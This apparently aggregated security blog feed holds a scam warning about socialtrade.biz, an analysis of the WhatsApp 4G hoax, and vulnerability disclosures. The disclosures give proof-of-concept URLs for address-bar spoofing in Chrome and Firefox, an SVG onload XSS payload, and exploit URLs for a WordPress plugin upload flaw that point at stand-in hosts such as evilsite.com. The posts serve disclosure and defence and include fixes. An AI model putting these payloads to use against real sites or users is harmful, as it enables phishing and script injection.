ad

The Hacking Articles

The Hacking Articles


Beware!! socialtrade.biz Scam Exposed !!

Posted: 20 Nov 2016 04:35 AM PST

Of course everyone wants to make easy money at home. Who wants to commute for an hour one way to a job in a major city? The answer is no one. That's why frauds taking advantage of and offering online work to just click some link and make money from doing just daily 10-15 min work. They target definite vulnerable demographic segments of the population, such as the elderly or disadvantaged. And as bad as this gets, they also trick highly educated and Internet savvy people too into believing that they can make money fast on these programs.

Many frauds are taking advantage of this and you may lose your hard earned money.

Guys if you remember in 2011 I also warned peoples about speak asia scam and you know what happened who not believe that this is a scam loses all his hard earned money. Attention!! SpeakAsiaOnline Survey, Be Careful !!!

Socialtrade.biz is also scam and is being nurtured by Educated IT Professionals, promoted by Greedy Elites, who are members up the ladder & have no concern about the fallout & resulting losses to thousands of people down the line.
Observe the below rules and you will know that its fraud.
1.    Rs 5 per click to employee, Rs 5 goes to Employer- Still Employer asks for joining fee, that too, a high sum of 20000 to 50000.
2.    Booster Activation Period - 20 Days; Including holidays, so it comes down to 15–16 Days. Again activation takes 2–3 days. So, It further comes down to 12–13 days. So, You need to add 2 members in 12–13 days to activate booster (Which will enhance your income per day)
3.    Say, if you join and do not add any member down the leg- then - You will be stupidly clicking fake links for around 5 months to get your money back. As company is fraud, it can have money of all those members, who enrolled in last 5 months (& din't spread this virus) on any date either today or next Sunday or say your next birthday.
4.    If you continue spreading it, You may recover your investment ( though Company says - Its not an investment company & that huge joining fee is just a token of appreciation for their kind service of manipulating masses) in 2 months. But, those down the line will have their money stuck in this scam.
5.    So, If you see it now, its like, take the disease but pass it as fast as you can on someone (Actually 2 members) next, down the line.
6.    So, the mantra for Members - Keep spreading the disease, bear risk (& fear) of losing money just for 2 months (if you have done your service of spreading the virus to next 2 fools) and thereafter enjoy fruits of your (fake) attributes as managerial skills, Good Convincing, Risk Bearing blah-blah.
7.    If You are a member or if you become a member, you will follow (or have already trodden that path) Point 6 mentioned above. But, my request, first authenticate the claims put by company. Is clicking paying money or just the money is being circulated from new members to old members? If it looks like a scam, Stop yourself from supporting such scam.
8.    If you are not a member yet, Read again from points 1–5. Then ask yourself whether you are okay after fooling (and looting) poor members (Students/ Job Seekers/ Low earning fellows etc.) down the line. If yes, Go On — Sites like Social trade Biz are for likes of you.

How they Manipulation users:
• Each member pays a hefty amount of Rs. 57500/- to get membership. 
• The member gets 125 links (are mostly fake) to promote and earn 0. 625 per day, if booster is not activated. (Booster means making 2 members down the leg). 
• 20 days are given to a new member to activate booster. 
• Down the leg, if 2 members join, the one at top of them gets a booster income of Rs. 5000. 
• So, Say, if a new member pays Rs. 57500 and activates booster in next 15 days, the total payment to that member in next 3 months= 15 Days*625 + 50 Days* 1250 = 71875 + 5000 = 76875 
• Say, if 2 new members down the leg do not make any other member, Payment to these 2 members in next 2.5 months = 2*625*50 Days = 62500 
• Money still left with company= 57500*3 —76875 — 62500= 33125 .
• So for 3 members, Company has around 33000 with it, even after around 2.5 months of joining of 2 members down the leg. As shown, the company has done nothing other than just taking money from lower members & giving to higher members. 
• Say, If company has 200000 members on some date, then company would be having 100000 members at the bottom line, who would have joined in last 10-15 days. 
• Money with company from these 100000 members (Considering only new member money for now) = 57,500*1,00,000 = 5,75,00,00,000 (575 Crore) 
• Calculation is very easy now. Payments to those new members in last 10 days= 10*625*1,00,000 = 62,50,00,000 (62.5 Crores) 
• So Company can run away with 500 Crore on the day, when its membership reaches 200000. Some data shows, it already has more than 1 lakh members. Do you still think that its not a SCAM ? 

Why is it spreading so fast then ? 
• Educated persons leading the mission 
• Top members get huge amount, if new members are added fast. 
• Also, Members receive tablets, Laptops etc. if they make some specific no. of members down the leg in limited period. 
• Most important — Observe above carefully. The top member received Rs. 76875 in just 3  months. It means, they recovered their contribution & also made profits (By looting members down the leg). 

socialtrade.bizlisted some legal document for this business but if you check these all documents are for Ablaze Info Solutions which deal in IT Software Solutions work purpose.

Be wary if you have to pay money or supply your credit card number to a company to make money from these type of jobs. Some scammers make big promises with work at home opportunities, but in these you will lose all your hard earned money.

In Multi level Marketing(MLM) concept only those people make money who are at top of chains.

So if you are one of the victim of this scam stop investing your hard earned money in this scam.

Stay Safe....

See below links Devbhoomi news exposed this scam:




Users complains:







Hacking and Cracking

Hacking and Cracking


Whatsapp 4G VIP SCAM - Technical Analysis

Posted: 06 Sep 2016 11:12 AM PDT


This is a short blog post describing about a recent hoax pertaining the WhatsApp 4.0 version. I would like to clearly highlight that there is no such application as 'Whatsapp 4G'. The version promises users  unrealistic features video calling, new whatsapp themes, delete sent messages from both sides etc

The following is how the message is being propagated:


Technical Analysis 

Upon visiting the link you would be taken to a page where you would be asked to invite 15 friends before you can download the version, upon clicking the invite button, it would use WhatsApp scheme (whatspp://) in order send messages to your friends, and hence you would be promoting a hoax on behalf of the scammers:

The entire business logic is based upon the following client side script - http://new-4g-whatsapp.ga/invite.js.

Upon examining invite.js it was discovered that the code sets a cookie and checks if 15 invites have been sent on the client side: 



Once, the counter has reached up to 15 invites or above, you would be redirected to the download link:

From the above source code, if the value of c is greater or equal to '15', window.location.href would be set to "ur" variable which hosts the following download link - http://ta3.co/new-4G-whatsapp/install.php

The installation link seems to be dead, normally in such scams you would be asked to fill in surveys or installing *free apps* which would not be free as they might be shipped with Malware/adwares.


Update (Whatsapp Gold)


A new variation of Whatsapp 4G VIP scam has recently came into notice with name of "Whatsapp Gold", which basically works on the same principle as above. The only thing that has changed the interface design and name.

Hacking and Cracking

Hacking and Cracking


Breaking The Great Wall of Web - XSS WAF Evasion CheatSheet

Posted: 01 Sep 2016 03:07 AM PDT


I think it's mandatory to give back to Security community from where we learn cutting edge techniques and information. Therefore after months of effort i am presenting to you a new WhitePaper titled "Breaking Great Wall of Web" without any strings attached.


Acknowledgements

I would like to thank the Acunetix Team for helping with proof-reading of the document.

Background



The WhitePaper not only contains sophisticated XSS vectors but it aims at also explaining the methodology behind bypassing a WAF.  The previous paper on this subject "Bypassing Modern WAF's XSS Filters - Cheat Sheet" was released 3 years back. A lot has changed and evolved during these years, especially with the advent of ECMA Script a new horizon for evasion/obfuscation have been opened. I have already discussed/demonstrated several techniques presented in this whitepaper in my recent Webcast hosted by Garage4hackers team namely "Bypassing Modern WAF's Exemplified At XSS".

Abstract 



 Input Validation flaws such as XSS are the most prevailing security threats affecting modern Web Applications. In order to mitigate these attacks Web Application Firewalls (WAF's) are used, which inspect HTTP requests for malicious transactions. Nevertheless, they can be easily bypassed due to the complexity of JavaScript in Modern browsers. In this paper we will discusses several techniques that can be used to circumvent WAF's exemplified at XSS.

This will paper talk about the concepts of WAF's in general, identifying and fingerprinting WAF's and various methodologies for constructing a bypass. The paper discusses well known techniques such as Brute Forcing, Regular expression reversing and browser bugs for bypassing WAF's.

Hacking and Cracking

Hacking and Cracking


Google Chrome, Firefox Address Bar Spoofing Vulnerability

Posted: 15 Aug 2016 11:29 PM PDT

Introduction

Google security team themselves state that "We recognize that the address bar is the only reliable security indicator in modern browsers" and if the only reliable security indicator could be controlled by an attacker it could carry adverse affects, For instance potentially tricking users into supplying sensitive information to a malicious website due to the fact that it could easily lead the users to believe that they are visiting is legitimate website as the address bar points to the correct website.
In my paper "Bypassing Browser Security Policies For Fun And Profit" I have uncovered various Address Bar Spoofing techniques as well as bugs affecting modern browsers.  In this blog post I would discuss about yet another "Address Bar Spoofing" vulnerability affecting Google Chrome's Omnibox. Omnibox is a customized address bar api developed for better user experience such as search suggestions, URL prediction, instant search features so on and so forth.

Technical Details

Characters from languages are such as Arabic, Hebrew are displayed from RTL (Right To Left) order, due to mishandling of several unicode characters such as U+FE70, U+0622, U+0623 etc and how they are rendered combined with (first strong character) such as an IP address or alphabet could lead to a spoofed URL. It was noticed that by placing neutral characters such as "/", "اin filepath causes the URL to be flipped and displayed from Right To Left. However, in order for the URL to be spoofed the URL must begin with an IP address followed by neutral characters as omnibox considers IP address to be combination of punctuation and numbers and since LTR (Left To Right) direction is not properly enforced, this causes the entire URL to be treated and rendered from RTL (Right To Left). However, it doesn't have be an IP address, what matters is that  first strong character (generally, alphabetic character) in the URL must be an RTL character

Logical Order

The following is the logical order of characters in the memory.  Since, Omnibox removes"http://" and displays strings without "http://" prefix.

127.0.0.1/ا/http://example.com

Display Order

The following is the display order of characters after the browser removes the leading "http://", decodes the percent-escaped bytes, and applies the bidirectional algorithm.

http://example.com/‭ا/127.0.0.1

Steps To Reproduce

1) Visit the following link for the vulnerable browser - http://182.176.65.7/%EF%B9%B0/http://google.com/test

2) You would notice that the URL has been flipped from Right to left and the browser displays http://google.com/test/182.176.65.7 while it displays the content from the IP address.



The IP address part can be easily hided specially on mobile browsers by selecting a long URL (google.com/fakepath/fakepath/fakepath/... /127.0.0.1) in order to make the attack look more realistic. In order to make the attack more realistic unicode version of padlock can be used in order to demonstrate the presence of SSL.

Firefox Mobile Address Bar Spoofing CVE-2016-5267

Firefox was also prone to a similar vulnerability, however this did not require IP address to trigger, all it required was is arabic RTL characters, which in this case i provided arabic TLD (عربي.امارات) in order to trigger the vulnerability which resulted in

Proof of concept 

http://عربي.امارات/google.com/test/test/test


As you can see from the above screenshot that the page is hosted on عربي.امارات , however the address bar points to google.com.

Important Note

Variation of similar vulnerability has also been discovered in several other browsers that are still undergoing a fix there i am refraining from disclosing them. Details will be disclosed, once a fix has been landed. 

Fix

RFC 3987 § 4.1 states that "Bidirectional IRIs MUST be rendered in the same way as they would be if they were in a left-to-right embedding.", therefore setting paragraph direction to LTR fixes this issue. This is a known issue and has already been discussed in great detail here.

Credits

I am highly indebted to "Matt Giuca" from the Google Chrome team for his extensive help on this issue and "Tod Beardsley" for handling the disclosure.

Bug Bounty 

The total bounty rewarded for all bugs combined was 5000$.

Hacking and Cracking

Hacking and Cracking


Wordpress Mobile Detector Incorrect Fix Leads To Stored XSS

Posted: 13 Jun 2016 03:30 AM PDT


Recently, Wordpress Mobile Detector plugin was in news for the "Remote Code Execution" vulnerability that was found inside the resize.php file. The vulnerability allowed an external attacker to upload arbitrary files to the server as there was no validation being performed for the file-type that has to be retrieved from an external source.

Soon after the vulnerability became public, the plugin was taken down from wordpress directory until the issue was fixed. However, as per my analysis the fix is incomplete and leads to stored XSS. 

The Vulnerability

Let's discuss about the initial vulnerability first. The following PHP code takes input via src parameter (GET or POST) and checks for the existence of the file. If it exists, appropriate content-type header is set. 

Code

<?php
if (isset($_REQUEST['src'])) { $path = dirname(__FILE__) . "/cache/" . basename($_REQUEST['src']);
if(file_exists($path)){
.
.
.
.
file_put_contents($path, file_get_contents($_REQUEST['src']));

?>

It then utilizes the file_get_contents function in order to fetch file contents from a URL and upload it to the webhost under cache directory.  Please note that, this is only possible if allow_url_fopen is enable upon the server which limits the effectiveness and impact of the exploit.  The problem with the above code is that the code does not perform any check for extensions that are allowed.  So, in case if an can fetch/execute PHP, ASPX code it results in a code execution.

The (incomplete) Fix

The following fix was implemented which defined a whitelist of all extensions that are acceptable (primarily images). The code checks if the requested file ends with the whitelisted extensions before they are fetched and uploaded. 

<?php
.
.
.
.
.
$acceptable_extensions = ['png','gif','jpg','jpeg','jif','jfif','svg'];
$info = pathinfo($_REQUEST['src']);
// Check file extension
if(in_array($info['extension'],$acceptable_extensions)){
file_put_contents($path, file_get_contents($_REQUEST['src']));

?>

The problem with the above fix is that it whitelists "svg" extension. It is a widely known fact that svg images can execute JavaScript. 

Using SVG To Trigger Stored XSS

In order to demonstrate the finding, The following svg file would be hosted on a Remote Server. 

test.svg

<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="alert(1)" xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face font-family="y"/></font></defs></svg>

This image once requested via "src" parameter will be saved to cache directory:

http://www.example.com/wp-content/plugins/wp-mobile-detector/resize.php?src=evilsite.com/test.svg

Upon visiting the uploaded image: 

http://www.example.com/wp-content/plugins/wp-mobile-detector/cache/test.svg


Other Attack Possibilities

i) In case where path finishes with an allowed extensions there is an attack possibility - victim.com/test.php/test.jpg.

ii) In older version of PHP, it is possible to append a nullbyte and tricking the server into uploading a malicious PHP file. Example - http://evil.com/malicious.php.svg

iii) In case if Display_errors is set to true in php.ini file. The file_get_contents() function can be utilized for . A similar issue was discovered by me in the year 2013. You can refer to the following blog post -  phpThumb Server Side Request Forgery

iv) In case where path finishes with an allowed extensions there is an attack possibility - victim.com/test.php/test.jpg. 

v) Even allowing external users to fetch and upload images can external images might introduce issues such as someone can host porn images and tarnish companies reputation, someone can deliberately upload a copyrighted image and sue the company, since there is no limit to the number of images one can upload, one can still attempt to exhaust server resources by uploading tons of images. 

Suggested Fix For Vendor 

i) The suggested fix is removing the "svg" extension from whitelist

$acceptable_extensions = ['png','gif','jpg','jpeg','jif','jfif''];

ii) File names should be re-written after they are uploaded, so that their location may not be guessed. along with directory listing should also be disabled. 

Suggested Fix For Webmasters

iii) Server administrators should modify the .htaccess file to only support allowed extensions. and prevent accessing other files.

iv) Content-Type-Options: nosniff header to prevent exploiting the site using SWF file with .jpg extension for example - https://github.com/nccgroup/CrossSiteContentHijacking.

v) Content-Disposition header should be utilized.

Thanks for Soroush Dallili from NCC group and Daniel Sid from Sucuri for tipping off.